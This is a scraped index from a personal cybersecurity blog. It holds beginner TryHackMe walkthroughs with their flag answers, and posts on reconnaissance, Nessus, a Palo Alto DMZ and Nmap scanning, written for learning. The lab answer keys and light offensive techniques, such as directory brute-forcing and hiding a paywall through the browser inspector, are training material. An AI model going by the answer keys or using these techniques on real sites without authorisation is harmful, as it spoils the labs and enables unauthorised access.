id=\"task-3--\" class=\"relative group\"\u003eTask 3 - \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-3--\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cimg src=\"/assets/images/htb/htb-meow-1.png\"\u003e\n\u003cimg src=\"/assets/images/htb/htb-meow-2.png\"\u003e","title":"Meow - HTB Walkthrough by Nisha"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/misconfiguration/","section":"Tags","summary":"","title":"Misconfiguration"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/network-services/","section":"Tags","summary":"","title":"Network Services"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/telnet/","section":"Tags","summary":"","title":"Telnet"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/weak-credentials/","section":"Tags","summary":"","title":"Weak Credentials"},{"content":" Room Link: https://tryhackme.com/r/room/walkinganapplication\nIn the \"Walking An Application\" room on TryHackMe, you will learn how to manually assess a web application for security vulnerabilities using only the built-in tools available in your web browser. Automated security tools and scripts often miss many potential vulnerabilities and valuable information. This room emphasizes the importance of manual review to identify and understand these overlooked issues.\nLearning Objectives\nIn this room, you will use the following built-in browser tools to uncover and analyze security issues:\nView Source: Learn to view the human-readable source code of a website directly through your browser. Inspector: Understand how to inspect and modify page elements to access content that is typically restricted. Debugger: Explore how to inspect and control the flow of a page's JavaScript to uncover hidden functionalities and vulnerabilities. Network: Monitor all network requests made by a page to identify potential security issues and data exposures. By mastering these tools, you will be equipped to conduct a thorough and effective manual review of web applications, enhancing your ability to find and address security vulnerabilities that automated tools might miss.\nTask 1 - Walking An Application # To begin, start the virtual machine on this task, wait 2 minutes.\nUse either the in-browser attackbox or your own device over VPN to connect to the URL provided for your machine.\nTask 2 - Exploring The Website # Importance of Completing a Site Review for Discovered Pages As a penetration tester, one of your primary responsibilities is to identify features within a website or web application that could be vulnerable to exploitation. These typically include interactive elements that engage with the user.\nIdentifying these interactive parts can range from easily spotting a login form to thoroughly examining the website's JavaScript. A good starting point is to use your browser to explore the website, taking notes on each page, area, and feature, and summarizing your findings.\nConducting a comprehensive site review is essential as it ensures that all components and functionalities that might be susceptible to attacks are identified. By meticulously documenting your observations, you can guarantee that no significant areas are missed, allowing for a complete assessment of the site's security.\nHere's an example of a site review for the Acme IT Support website:\nHome Page: Provides an overview of services, with no interactive elements. News Page: Features the latest news at Acme IT Support. Contact Page: Includes a form for submitting contact information. Customer Support Portal: Requires user login, offering various support resources. Performing a detailed site review sets the stage for a thorough and effective penetration test, ensuring that all potential vulnerabilities are identified and examined.\nTask 3 - Viewing The Page Source # The page source is the human-readable code returned to our browser from the web server each time we make a request. This code comprises HTML (HyperText Markup Language), CSS (Cascading Style Sheets), and JavaScript, which collectively dictate the content, layout, and interactivity of the webpage.\nViewing the page source can reveal important information about the web application. It helps in identifying hidden content, comments left by developers, and potential vulnerabilities.\nHow to View the Page Source Right-click on the webpage and select View Page Source from the context menu. Alternatively, you can prepend view-source: to the URL in the browser’s address bar (e.g., view-source:https://www.google.com/). Most browsers also have an option to view the page source within the menu, often located under Developer Tools or More Tools. Let's View Some Page Source! Try viewing the page source of the Acme IT Support website’s homepage. While a complete explanation of the code is beyond the scope of this room, we can highlight critical elements:\nComments: Look for code sections starting with \u0026lt;!-- and ending with --\u0026gt;. These are developer comments that can provide insights or notes. For example, a comment may indicate that the homepage is temporary while a new one is under development. Follow any links in the comments to find your first flag. Anchor Tags: Links to different pages are written in anchor tags (\u0026lt;a\u0026gt;) with the URL specified in the href attribute. For instance, the contact page link might be found on line 31. Hidden Links: Further down the page source, you may find hidden links starting with \"secr\". Viewing these links might reveal private areas used for storing sensitive information. In this room, these links lead to flags. External Files: CSS, JavaScript, and images can be included via HTML. Sometimes, directory listing is enabled by mistake, revealing all files in a directory. This can expose confidential information like backup files or source code. Check the directories for misconfigurations and find the flag.txt file. Websites often use frameworks—prebuilt code collections for common features like blogs, user management, and form processing. Viewing the page source can indicate if a framework is in use and its version. Knowing the framework and version can help identify known vulnerabilities. For example, a comment at the bottom of the page might indicate the framework and version, along with a link to the framework's website. Reviewing this information can lead you to another flag by identifying if the framework is outdated. Right-click on the page and select \u0026ldquo;View page source\u0026rdquo; Visit the page that is referenced in the page comment to retrieve the flag.\nQ: What is the flag from the HTML comment? Answer: THM{HTML_COMMENTS_ARE_DANGEROUS}\nQ: What is the flag from the secret link? Answer: THM{NOT_A_SECRET_ANYMORE} Q: What is the directory listing flag? Answer: THM{INVALID_DIRECTORY_PERMISSIONS} Q: What is the framework flag? Answer: THM{KEEP_YOUR_SOFTWARE_UPDATED} Task 4 - Developer Tools - Inspector # Developer Tools\nEvery modern browser includes developer tools; this is a tool kit used to aid web developers in debugging web applications and gives you a peek under the hood of a website to see what is going on. As a pentester, we can leverage these tools to provide us with a much better understanding of the web application. We're specifically focusing on three features of the developer tool kit, Inspector, Debugger and Network.\nOpening Developer Tools\nThe way to access developer tools is different for every browser. The example below is demonstrated on a Firefox browser:\nInspector The page source does not always reflect the current state of a webpage, as CSS, JavaScript, and user interactions can alter its content and style. To see what is being displayed in the browser at any given moment, we use the Element Inspector. This tool provides a live view of the webpage as it appears currently.\nIn addition to viewing this live representation, we can edit and interact with the page elements. This functionality is particularly useful for web developers to troubleshoot and debug issues.\nOn the Acme IT Support website, navigate to the news section, where you will find three news articles.\nThe first two articles are readable, but the third has been blocked with a floating notice above the content stating you have to be a premium customer to view the article. These floating boxes blocking the page contents are often referred to as paywalls as they put up a metaphorical wall in front of the content you wish to see until you pay.\nRight-clicking on the premium notice ( paywall ), you should be able to select the Inspect option from the menu, which opens the developer tools either on the bottom or right-hand side depending on your browser or preferences. You'll now see the elements/HTML that make up the website.\nLocate the DIV element with the class premium-customer-blocker and click on it. You'll see all the CSS styles in the styles box that apply to this element, such as margin-top: 60px and text-align: center. The style we're interested in is the display: block. If you click on the word block, you can type a value of your own choice. Try typing none, and this will make the box disappear, revealing the content underneath it and a flag. If the element didn't have a display field, you could click below the last style and add in your own. Have a play with the element inspector, and you'll see you can change any of the information on the website, including the content. Remember this is only edited on your browser window, and when you press refresh, everything will be back to normal. Q: What is the flag behind the paywall?\nAnswer: THM{NOT_SO_HIDDEN} Task 5 - Developer Tools - Debugger #The Debugger panel in developer tools is primarily designed for debugging JavaScript, making it a valuable resource for web developers trying to identify issues in their code. For penetration testers, it offers the capability to delve into the JavaScript code. In Firefox and Safari, this tool is named Debugger, while in Google Chrome, it's referred to as Sources.\nOn the Acme IT Support website, navigate to the contact page. Each time the page loads, you might observe a quick red flash on the screen. We will use the Debugger to investigate this red flash and determine if it contains any interesting information. Although debugging a red dot is not a typical task for a penetration tester, it helps us familiarize ourselves with the Debugger's functionality.\nIn both browsers, you'll find a list of all resources used by the current webpage on the left-hand side. By navigating to the assets folder, you will find a file named flash.min.js. Clicking on this file will display its JavaScript content.\nOften, JavaScript files are minified, meaning all formatting (tabs, spaces, and newlines) is removed to reduce the file size. This file is no different and is also obfuscated, making it deliberately hard to read to prevent easy copying by other developers.\nWe can partially restore the formatting using the \"Pretty Print\" option, represented by two braces { }, to make the code somewhat more readable. However, due to the obfuscation, it may still be challenging to understand. By scrolling to the bottom of the flash.min.js file, you will find the line: flash['remove']();\nQ: What is the flag in the red box? Answer: THM{CATCH_ME_IF_YOU_CAN} Task 6 - Developer Tools - Network # The Network tab in developer tools is useful for monitoring every external request made by a webpage. By clicking on the Network tab and refreshing the page, you can view all the files the page is requesting.\nTry this on the contact page. If the list becomes too cluttered, you can use the trash can icon to clear it.\nWith the Network tab open, fill out the contact form and click the Send Message button. You will see an event appear in the Network tab. This event represents the form submission happening in the background via AJAX. AJAX allows web applications to send and receive data in the background without reloading the current page.\nQ: What is the flag shown on the contact-msg network request? Answer: THM{GOT_AJAX_FLAG} ","date":"September 27, 2023","permalink":"https://notesbynisha.com/posts/2023-09-27-walking-an-application-thm-walkthrough/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e  \u003ca href=\"https://tryhackme.com/r/room/walkinganapplication\" target=\"_blank\"\u003e\u003ca href=\"https://tryhackme.com/r/room/walkinganapplication\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://tryhackme.com/r/room/walkinganapplication\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eIn the \"Walking An Application\" room on TryHackMe, you will learn how to manually assess a web application for security vulnerabilities using only the built-in tools available in your web browser. Automated security tools and scripts often miss many potential vulnerabilities and valuable information. This room emphasizes the importance of manual review to identify and understand these overlooked issues.\u003c/p\u003e","title":"Walking An Application - THM Walkthrough by Nisha"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/web-app/","section":"Tags","summary":"","title":"Web App"},{"content":"The Art of Reconnaissance: A Critical Tool in Cybersecurity # Welcome to Day 4 of my 100 Days of Cybersecurity Challenge. As I progress through this intensive learning journey, I’m thrilled to share some insights into one of the most critical aspects of cybersecurity: reconnaissance.\nReconnaissance in the digital realm is akin to an intelligence-gathering mission that precedes any strategic battle. This initial phase is about collecting exhaustive information regarding a potential target, which could range from a network to an entire organization’s online presence.\nThe Defensive Edge of Reconnaissance For those of us on the defensive side of cybersecurity, reconnaissance is not just a task but an advantage. It allows us to scan for and scrutinize the data that’s publicly available about our systems. We’re talking about unraveling vulnerabilities and weak links that could be fortified to ward off cyber threats. By doing so, we preemptively shield our digital assets from nefarious attacks and secure the cyber fortresses we safeguard.\nThe Offense Uses It Too However, it’s a double-edged sword. Bad actors are also employing reconnaissance to scope out soft spots in cyber defenses. They meticulously gather data, seeking out open ports or mining personal details that could be woven into the fabric of sophisticated social engineering and phishing exploits. It’s a chilling reminder of the constant vigilance required in our field.\nTools of the Trade My hands-on learning session had me engaging with the essential tools of cybersecurity reconnaissance. I investigated domain ownership through WHOIS, conducted DNS queries using nslookup and dig, and searched for internet-connected devices with Shodan. I also probed the Google Hacking Database to discover security gaps that are exposed via search queries. Additionally, other resources like the Threat Intelligence Platform, viewdns.info, and Censys offered me a comprehensive overview of internet assets and their potential vulnerabilities.\nResources and Moving Forward I’ve also been fortunate to access remarkable resources to bolster my reconnaissance skills. Platforms like Cisco Skills for All offer an ‘Ethical Hacker’ course, while ‘The Cyber Mentor’ provides a comprehensive ‘Ethical Hacking in 15 Hours’ training. For a more focused approach, TryHackMe’s ‘Passive Reconnaissance’ module was particularly insightful.\nAs I continue on this challenge, my excitement only grows. I’m committed to deepening my understanding of cybersecurity and amping up my skills to stay ahead in this ever-evolving cyber battleground. Stay tuned for more updates as I venture through the #100DaysOfCybersecurity.\nUntil then, stay secure and vigilant in the cybersecurity quest!\nConnect with me on LinkedIn: https://www.linkedin.com/in/nishaprudhomme/\n#NotesbyNisha #cybertechdave100daysofcyberchallenge #cyversity #Womenintech #blackwomenintech #womenincybersecurity #Reconnaissance #CybersecurityDefense #StaySecure #cybersecurity\n","date":"September 19, 2023","permalink":"https://notesbynisha.com/posts/2023-09-19-the-art-of-reconnaissance-in-cybersecurity/","section":"Writing","summary":"\u003ch2 id=\"the-art-of-reconnaissance-a-critical-tool-in-cybersecurity\" class=\"relative group\"\u003eThe Art of Reconnaissance: A Critical Tool in Cybersecurity \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#the-art-of-reconnaissance-a-critical-tool-in-cybersecurity\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cimg src=\"/assets/images/5 - Reconnaissance.png\"\u003e\n\u003cp\u003eWelcome to Day 4 of my \u003cb\u003e100 Days of Cybersecurity Challenge\u003c/b\u003e. As I progress through this intensive learning journey, I’m thrilled to share some insights into one of the most critical aspects of cybersecurity: reconnaissance.\u003c/p\u003e","title":"The Art of Reconnaissance in Cybersecurity"},{"content":" Room Link: https://tryhackme.com/r/room/introtooffensivesecurity\nTask 1 - What is Offensive Security? # Question: Which of the following options better represents the process where you simulate a hacker\u0026rsquo;s actions to find vulnerabilities in a system? Offensive Security Defensive Security Answer: Offensive Security Task 2 - Hacking Your First Machine #This TryHackMe module introduces beginners to hacking by guiding them through a simulated and legal exercise. The task involves using a command-line tool called GoBuster to brute-force the website of a fake bank application, FakeBank, to uncover hidden directories and pages. Participants start by opening a terminal on a virtual machine provided by the platform. The task includes: Starting the Machine: Load a virtual machine in Split View to access FakeBank. Using GoBuster: Execute a command in the terminal to find hidden pages on the FakeBank website by brute-forcing with a list of potential page names. Accessing Hidden Pages: Locate a hidden bank transfer page and perform a simulated hack by transferring money between accounts, demonstrating how an attacker might exploit such vulnerabilities. Verify the success of the transfer and answer related questions before terminating the virtual machine. This exercise simulates real-world penetration testing to identify and report vulnerabilities in web applications. Your First Hack Step 1 - Open a terminal On the machine, open the terminal using the Terminal icon: Step 2 - Find hidden website pages Execute the following command on the terminal:\nStep 3 - Hack the Bank Transfer $2000 from the bank account 2276, to your account (account number 8881). If your transfer was successful, you should now be able to see your new balance reflected on your account page. Go there now and confirm you got the money! (You may need to hit Refresh for the changes to appear)\nQuestion: Above your account balance, you should now see a message indicating the answer to this question. Can you find the answer you need? Answer: BANK-HACKED\nIf you were a penetration tester or security consultant, this is an exercise you’d perform for companies to test for vulnerabilities in their web applications; find hidden pages to investigate for vulnerabilities. Task 3 - Careers in Cyber Security # How to Start Learning Cybersecurity Many people wonder how to become hackers (security consultants) or defenders (security analysts fighting cybercrime). The process is straightforward: focus on a specific area of cybersecurity, and practice regularly through hands-on exercises. By dedicating a little time each day to learning on TryHackMe, you can build the skills necessary to land your first job in the industry. Real Success Stories: Paul transitioned from a construction worker to a security engineer. Kassandra moved from being a music teacher to a security professional. Brandon leveraged TryHackMe during school to secure his first job in cybersecurity. Career Paths in Cybersecurity: For more detailed insights into various cybersecurity careers, explore the cyber careers room on TryHackMe. Here’s a brief overview of a few offensive security roles:\nPenetration Tester: Tests technology products to identify security vulnerabilities. Red Teamer: Simulates adversary attacks to provide feedback from an attacker’s perspective. Security Engineer: Designs, monitors, and maintains security controls, networks, and systems to prevent cyberattacks. By committing to daily practice and exploring different career paths, you can successfully enter the cybersecurity field.\n","date":"September 18, 2023","permalink":"https://notesbynisha.com/posts/2023-09-18-intro-to-offensive-security-thm-walkthrough/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e  \u003ca href=\"https://tryhackme.com/r/room/introtooffensivesecurity\" target=\"_blank\"\u003e\u003ca href=\"https://tryhackme.com/r/room/introtooffensivesecurity\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://tryhackme.com/r/room/introtooffensivesecurity\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2 id=\"task-1---what-is-offensive-security\" class=\"relative group\"\u003eTask 1 - What is Offensive Security? \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-1---what-is-offensive-security\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cstrong\u003e Question: Which of the following options better represents the process where you simulate a hacker\u0026rsquo;s actions to find vulnerabilities in a system? \u003c/strong\u003e \u003cbr\u003e\u003c/p\u003e","title":"Introduction to Offensive Security - THM Walkthrough by Nisha"},{"content":"Vulnerability Scanning with Tenable Nessus #🚀 Day 3 of my #100DaysOfCybersecurity challenge is all about getting hands-on with Tenable Nessus! 🕵️‍♂️\nJust dived into this powerful cybersecurity tool developed by Tenable, Inc. It\u0026rsquo;s a go-to solution for vulnerability assessment and management.\nHere\u0026rsquo;s a peek at what I was able to accomplish:\nI downloaded and installed Nessus as a tool on my Kali Linux VM and then I initiated Basic Scans against two other devices on my home network: 💻 Hulk - a Windows 10 VM that is being used as a Universal Forwarder for sending WinEvent logs to my Splunk server 💻 GNS3 Server VM - a network simulator application that is running on a Linux Server VM Here's what #Nessus can do: 💪 Benefits and Solutions: 🔍 Vulnerability Assessment: It scans and assesses your systems, devices, and apps to pinpoint security weaknesses, known vulnerabilities, and misconfigurations. From servers to routers, it's got you covered. ✔ Compliance Check: Helps meet regulations like PCI DSS, HIPAA, and NIST by finding non-compliance vulnerabilities. ✳ Risk Analysis: Rates vulnerabilities by severity, so you can tackle the big problems first. 📈Asset Management: Keeps your asset inventory current, making management and security easier. 👊🏽 Action Time: After scanning, prioritize, remediate, and monitor vulnerabilities. The following resources were helpful for my learning activities:\n📽 Josh Madakor's Nessus Scanning Tutorial: https://lnkd.in/ga7tCUNA 📽 The Cyber Mentor's Nessus Scanning Tutorial: https://lnkd.in/gQCF6hKP 📽 TryHackme: Nessus Scanning Lab: https://lnkd.in/guym5RV9 Stay tuned for more of my cybersecurity adventures! Follow me on LinkedIn!\n","date":"September 17, 2023","permalink":"https://notesbynisha.com/posts/2023-09-17-vulnerability-scanning-nessus/","section":"Writing","summary":"\u003ch3 id=\"vulnerability-scanning-with-tenable-nessus\" class=\"relative group\"\u003eVulnerability Scanning with Tenable Nessus \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#vulnerability-scanning-with-tenable-nessus\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h3\u003e\u003cp\u003e🚀 Day 3 of my #100DaysOfCybersecurity challenge is all about getting hands-on with \u003ca href=\"https://www.tenable.com/try\"\u003e Tenable Nessus!\u003c/a\u003e 🕵️‍♂️\u003c/p\u003e","title":"Vulnerability Scanning Nessus"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/firewall/","section":"Tags","summary":"","title":"Firewall"},{"content":"Configuring a DMZ Zone and Policy Using Palo Alto Firewall #On Day 2 of my #100DaysofCybersecurity challenge, I focused on enhancing defenses by making progress on my Palo Alto Firewall lab.\nHere\u0026rsquo;s a peek into what I accomplished:\n🏭 Added a DMZ appliance: I integrated a DMZ (Demilitarized Zone) appliance into my network topology. This strategic placement enhances my security posture by creating an additional layer of defense.\n🚧 Inside-to-DMZ Policy: Implemented an inside-to-DMZ security policy to carefully control traffic between my internal network and my DMZ zone. Security is all about control and visibility, right?\n🌐 Outside-to-DMZ Policy: Crafted an outside-to-DMZ security policy to safeguard my DMZ from external threats.\n🔁 NAT Policy Rule: Set up a Network Address Translation (NAT) policy rule, ensuring that traffic originating from the outside zone can securely reach my DMZ.\nAdding DMZ Appliance The DMZ Server within my topology is a Cisco router that will act as a webserver to accept HTTP, HTTPS, and SSH requests. This DMZ server has a default route configured to route to the DMZ interface of the firewall, port e1/2 at IP address 172.16.1.11.\nInside-to-DMZ Access Policies On the Palo Alto Firewall, there is a default inter-zone security policy that is configured to automatically deny any inter-zone traffic that has not been explicitly permitted. This means that any traffic that originates from devices within my Inside Zone that is destined to my DMZ server that lives in the DMZ Zone, will be dropped.\nAttempts to access the DMZ server at it\u0026rsquo;s IP Address (172.16.1.1) using the browser of my Windows Client PC (Inside Zone - 10.1.1.3) are met with an error message indicating that \u0026ldquo;This site cannot be reached\u0026rdquo;.\nNext, I attempted to initiate an SSH connection from the Windows PC in the Inside Zone to the DMZ server of the DMZ subnet using the Putty.exe terminal emulator.\nThis SSH connect request is met with an error message indicating \u0026ldquo;Network error: Connection timed out\u0026rdquo;.\nAn inspection of the Traffic Logs on the Palo Alto Firewall proves that the requests from the Windows Client machine (10.1.1.3) to destination IP 172.16.1.1 (DMZ server\u0026rsquo;s private IP address) were dropped by the firewall.\nAt this point, it is the default configured Security Policy that manages the Interzone traffic routing for the Inside devices to reach devices that live in the DMZ zone. Next, I will configure a security policy to allow routing of this traffic.\nConfiguration of Inside-to-DMZ Zone Security Policy The configuration of the Inside-to-DMZ Zone Security Policy consisted of the following steps:\nGeneral information - name of the policy Source Information - Source Zone and Source Address Information Destination Information - Destination Zone: DMZ, Destination Address: DMZ Server's Private IP Address Application Information - Applications for this rule Action Information: Allow and log Testing the New Security Rule for Inside Zone to DMZ Zone Traffic As indicated in the following tests from devices within the internal zone to the DMZ server in the DMZ zone, the network traffic was allowed by the new firewall policy.\nOutside-to-DMZ Access Policy With Static NAT Here I had to configure an Outside to DMZ Security Policy with Destination Static NAT to allow public Internet users to access my webserver on its public IP address (123.1.1.54). I also created a Destination NAT policy to allow traffic that is initiated from the outside of the network via the public IP address to have that destination address translated to the web server's private IP address. The configuration below should be the DMZ-SERVER-PRIVATE-IP for the Translated Address.\nSecurity Policy Rule Configuration Testing the Outside Zone to DMZ Zone Security Policy Thank you for reading!\nConnect with me on LinkedIn ","date":"September 16, 2023","permalink":"https://notesbynisha.com/posts/2023-09-16-configuring-dmz-with-palo-alto-firewall/","section":"Writing","summary":"\u003ch3 id=\"configuring-a-dmz-zone-and-policy-using-palo-alto-firewall\" class=\"relative group\"\u003eConfiguring a DMZ Zone and Policy Using Palo Alto Firewall \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#configuring-a-dmz-zone-and-policy-using-palo-alto-firewall\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h3\u003e\u003cp\u003eOn Day 2 of my #100DaysofCybersecurity challenge, I focused on enhancing defenses by making progress on my Palo Alto Firewall lab.\u003c/p\u003e","title":"How to Create Configure a DMZ on Palo Alto FIrewall"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/network-security/","section":"Tags","summary":"","title":"Network Security"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/networking/","section":"Tags","summary":"","title":"Networking"},{"content":"Vulnerability Scanning with Nmap: Network Scanning # What is Nmap and which problems does it solve in Cybersecurity? Nmap (Network Mapper) is a powerful open-source network scanning and host discovery tool used in cybersecurity. It allows security professionals and ethical hackers to assess the security posture of computer networks by identifying open ports, services running on those ports, and potential vulnerabilities. Nmap is a versatile and essential utility in the arsenal of cybersecurity experts for conducting network reconnaissance and penetration testing.\nNmap provides the following capabilities and benefits: Network Scanning. It sends packets to target hosts and analyzes the responses to determine which ports are open, closed, or filtered. By discovering open ports, administrators can assess potential vulnerabilities and take appropriate security measures. \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;Host Discovery. \u0026lt;/b\u0026gt; Nmap can efficiently discover hosts on a network by sending specific packets to determine which IP addresses are active and reachable. This feature aids in creating an inventory of devices on the network and identifying unauthorized or rogue systems.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt; OS Fingerprinting. \u0026lt;/b\u0026gt; Nmap can perform OS fingerprinting by analyzing how a target responds to certain packets. By identifying the underlying operating system, security professionals gain insight into potential security weaknesses specific to that OS. \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt; \u0026lt;b\u0026gt;Version Detection. \u0026lt;/b\u0026gt; The tool can determine the version and service details of applications running on open ports. Knowing the specific service version helps in identifying known vulnerabilities associated with that version. \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;\u0026lt;b\u0026gt;Scripting Engine.\u0026lt;/b\u0026gt; Nmap features a powerful scripting engine called NSE (Nmap Scripting Engine). This enables users to create custom scripts or use existing ones to automate tasks, gather more information, or perform advanced network scanning techniques. \u0026lt;/li\u0026gt; Cybersecurity Applications. In cybersecurity, Nmap plays a vital role in various scenarios: \u0026lt;ul\u0026gt; \u0026lt;li\u0026gt;Network Security Audits: Nmap helps assess the security of a network by revealing potential entry points and vulnerabilities that attackers could exploit. \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Penetration Testing: Ethical hackers use Nmap during penetration testing to identify weak points in a network's defenses, simulating real-world attack scenarios.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Incident Response: In the event of a security breach, Nmap can assist in understanding the scope and impact of the incident by scanning affected systems. \u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Network Mapping: Nmap aids in creating visual representations of network topologies, allowing administrators to manage and secure the network effectively.\u0026lt;/li\u0026gt; \u0026lt;/ul\u0026gt; \u0026lt;/ul\u0026gt; Perform a Basic Ping Scan Using the Hostname scanme.nmap.org # Perform a Scan of all four IP addresses of a Web Server\u0026rsquo;s /30 Subnet # Run an Nmap Scan on an Authorized Target and Reference the Man Page as needed # Perform an Nmap Scan Using Options to Further Assess the Network # Output Nmap Scan Results to a File # Nmap option P for port. Here I specified scanning of port 80 only Option A to enable OS detection, version detection, script scanning, and trace route. We are enabling option oN to output the scan results to a text file named scan.txt The hostname followed by the /30 subnet specification, scanme.nmap.org /30 Verification of Output File # Read the Contents of the Output File # Scenario: Evaluate the security of a company\u0026rsquo;s web server to ensure that it is secure against potential attacks. We can perform a scan to collect information about its configuration, running services, and open ports. #This process can help us to assess the state of the server\u0026rsquo;s security to uncover any issues that can potentially expose it to threats. As a followup to our assessment, we can determine next steps to enhance the security of the web server and create a baseline for future assessments.\nInitiate a scan only on port 80, the default HTTP port - A option for the aggressive scan option will enable multiple features including OS detection, version detection, and script scanning. This option allows us to gather as much information as possible about the server to identify potential vulnerabilities or misconfigurations related to the web service running on port 80. Target is the /30 CIDR range of the web server at domain scanme.nmap.org /30 -oN option with scan.txt will save the output of the scan to a file named scan.txt so that it will be accessble for later review Based on the scan results:\nWe observe that there is a particular IP address that is showing port 80 running HTTP as filtered. This indicates that Nmap is not a ble to determine if the port is in an open or closed state. This may be due to a firewall, an Intrusion Prevention System (IPS), a router, or another security appliance that is blocking or filtering the probe packets being sent by Nmap.\nWe observe that NGINX is associated with a few IP addresss. It is common for NGINX to be open and running on port 80, as it is often used as a web server, a reverse proxy server, or a load balancer. Having the service run on port 80 allows it to serve websites and applications to clients using standard HTTP connections.\nIt is critical to maintain regular updates to NGINX to the latest patch versions and to perform any OS hardending features to ensure proper configuration that will help mitigate potential vulnerabilities.\nWe observe that this this server is also running on a CentOS machine. Knowing the OS is helpful in allowing to provide tailored recommendations to the security team for securing the system with any specific configuration settings or services and features that need to be disabled or enabled to provide the greatest level of protection.\nRun a Customized Scan on a Target Host # Reference: Nmap Port Scanning Optionss Guide ","date":"August 6, 2023","permalink":"https://notesbynisha.com/posts/2023-08-06-vulnerability-scanning-with-nmap-network-scanning/","section":"Writing","summary":"\u003ch3 id=\"vulnerability-scanning-with-nmap-network-scanning\" class=\"relative group\"\u003eVulnerability Scanning with Nmap: Network Scanning \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#vulnerability-scanning-with-nmap-network-scanning\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h3\u003e\u003cimg src=\"/assets/images/nmap logo.jpg\"\u003e\n\u003ch4\u003e What is Nmap and which problems does it solve in Cybersecurity?  \u003c/h4\u003e\n\u003cp\u003eNmap (Network Mapper) is a powerful open-source network scanning and host discovery tool used in cybersecurity. It allows security professionals and ethical hackers to assess the security posture of computer networks by identifying open ports, services running on those ports, and potential vulnerabilities. Nmap is a versatile and essential utility in the arsenal of cybersecurity experts for conducting network reconnaissance and penetration testing.\u003c/p\u003e","title":"Vulnerability Scanning With Nmap Network Scanning"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/azure/","section":"Tags","summary":"","title":"Azure"},{"content":"How to Configure DNS Settings in Microsoft Azure # Lab Guide from Microsoft Learning ","date":"August 3, 2023","permalink":"https://notesbynisha.com/posts/2023-08-03-configure-dns-settings-in-azure/","section":"Writing","summary":"\u003ch2 id=\"how-to-configure-dns-settings-in-microsoft-azure\" class=\"relative group\"\u003eHow to Configure DNS Settings in Microsoft Azure \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#how-to-configure-dns-settings-in-microsoft-azure\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/3wjQhngR_hM?si=haAlUC4PZjPCe0Qx\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen\u003e\u003c/iframe\u003e\n\u003cp\u003e\u003ca href=\"https://microsoftlearning.github.io/AZ-700-Designing-and-Implementing-Microsoft-Azure-Networking-Solutions/Instructions/Exercises/M01-Unit%206%20Configure%20DNS%20settings%20in%20Azure.html\"\u003e Lab Guide from Microsoft Learning \u003c/a\u003e\u003c/p\u003e","title":"How to Configure DNS Settings in Microsoft Azure"},{"content":"Create Virtual Networks (VNets) in Azure # Lab Guide from Microsoft Learning ","date":"August 1, 2023","permalink":"https://notesbynisha.com/posts/2023-08-01-create-virtual-networks-in-azure/","section":"Writing","summary":"\u003ch2 id=\"create-virtual-networks-vnets-in-azure\" class=\"relative group\"\u003eCreate Virtual Networks (VNets) in Azure \u003cspan class=\"absolute top-0 w-6 transition-opacity 